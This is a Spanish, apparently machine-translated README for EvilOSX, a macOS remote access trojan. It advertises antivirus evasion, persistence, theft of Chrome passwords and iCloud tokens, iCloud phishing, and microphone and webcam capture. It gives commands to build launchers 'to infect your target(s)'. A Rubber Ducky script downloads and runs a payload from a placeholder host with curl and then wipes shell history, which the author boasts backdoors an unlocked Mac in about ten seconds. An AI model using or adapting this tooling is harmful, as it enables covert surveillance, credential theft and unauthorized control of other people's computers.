
Malvado
Una rata malvada (herramienta de administración remota) para MacOS / OS X.
Generador de Marco de Cedric Owens
Este proyecto ya no está activo
Características
- Emular una instancia terminal
- Sistema de módulo de extensible simple
- No hay dependencias de bot (Python puro)
- Sin detectar por antivirus (OpenSSL AES-256 cargas útiles cifradas)
- Persistente
- Soporte de GUI y CLI
- Recuperar contraseñas de Chrome
- Recuperar tokens y contactos de iCloud
- Recuperar/monitorear el portapapeles
- Recupere el historial del navegador (Chrome y Safari)
- Phish para contraseñas de iCloud a través de iTunes
- Enumeración de copia de seguridad de iTunes (iOS)
- Grabe el micrófono
- Tome una captura de pantalla o una imagen de escritorio con la cámara web
- Intente obtener raíz a través de la escalada de privilegios locales
Cómo usar
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX
# Go into the repository
$ cd EvilOSX
# Install dependencies required by the server
$ sudo pip install -r requirements.txt
# Start the GUI
$ python start.py
# Lastly, run a built launcher on your target(s)
ADVERTENCIA: Debido a que las cargas útiles se crean exclusivas para el sistema de destino (automáticamente por el servidor), el servidor debe estar ejecutándose cuando cualquier BOT se conecta por primera vez.
Usuarios avanzados
También hay un CLI para aquellos que quieren usar esto sobre SSH:
# Create a launcher to infect your target(s)
$ python start.py --builder
# Start the CLI
$ python start.py --cli --port 1337
# Lastly, run a built launcher on your target(s)
Capturas de pantalla
Motivación
Este proyecto fue creado para ser utilizado con mi patito de goma, aquí está el script simple:
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/
DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500
REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER
STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
- Se tarda unos 10 segundos en la puerta trasera cualquier Mac desbloqueada, que es ... agradable
- Termina L se escribe de esa manera intencionalmente, en algunos sistemas Spotlight no encontrará el terminal de otra manera.
- Para evitar el Asistente de configuración del teclado, asegúrese de cambiar el video y el PID que se puede encontrar aquí.
El teclado de aluminio (ISO) es probablemente el que está buscando.
Versiones
Evilosx se mantendrá bajo las pautas de versiones semánticas tanto como sea posible.
Las versiones de servidor y bot estarán numeradas con el formato de seguimiento:
Y construido con las siguientes pautas:
- Romper la compatibilidad hacia atrás (con bots más antiguos) golpea a los principales
- Nuevas adiciones sin romper la compatibilidad atrasada aumenta el menor
- Corrección de errores y cambios misceláneos tope el parche
Para obtener más información sobre Semver, visite https://semver.org/.
Notas de diseño
- Infectar una máquina se divide en tres partes:
- Se ejecuta un lanzador en la máquina de destino cuyo único objetivo es ejecutar el stager
- El Stager le pide al servidor un cargador que maneja cómo se cargará una carga útil.
- El cargador recibe una carga útil excretada de forma única y luego se envía de regreso al stager
- El servidor oculta sus comunicaciones enviando mensajes ocultos en las páginas de error HTTP 404 (de la "escondite de Blackhat a la vista")
- Las solicitudes de comando se recuperan del servidor a través de una solicitud GET
- Las respuestas de comando se envían al servidor a través de una solicitud de publicación
- Los módulos aprovechan la naturaleza dinámica de Python, simplemente se envían a través de la red comprimida con ZLIB, junto con cualquier opción de configuración
- Dado que el bot solo se comunica con el servidor y nunca al revés, el servidor no tiene forma de saber cuándo un bot no se desconecta
Asuntos
No dude en enviar cualquier problema o solicitud de función aquí.
Que contribuye
Para obtener una guía simple sobre cómo crear módulos, haga clic aquí.
Créditos
- El increíble proyecto Empire
- Shoutout a Patrick Wardle por sus increíbles charlas, mira Objetivo-Ver
- Manwhoami para sus proyectos: OsxChromedecrypt, Mmetokendecrypt, iCloudContacts
(ahora eliminado ... avísame si reapareces) - El módulo Slowloris está prácticamente copiado de Pyslowloris
- Urwid y este código que me ahorró mucho tiempo con el CLI
- Logotipo creado por Motusora
Licencia
GPLV3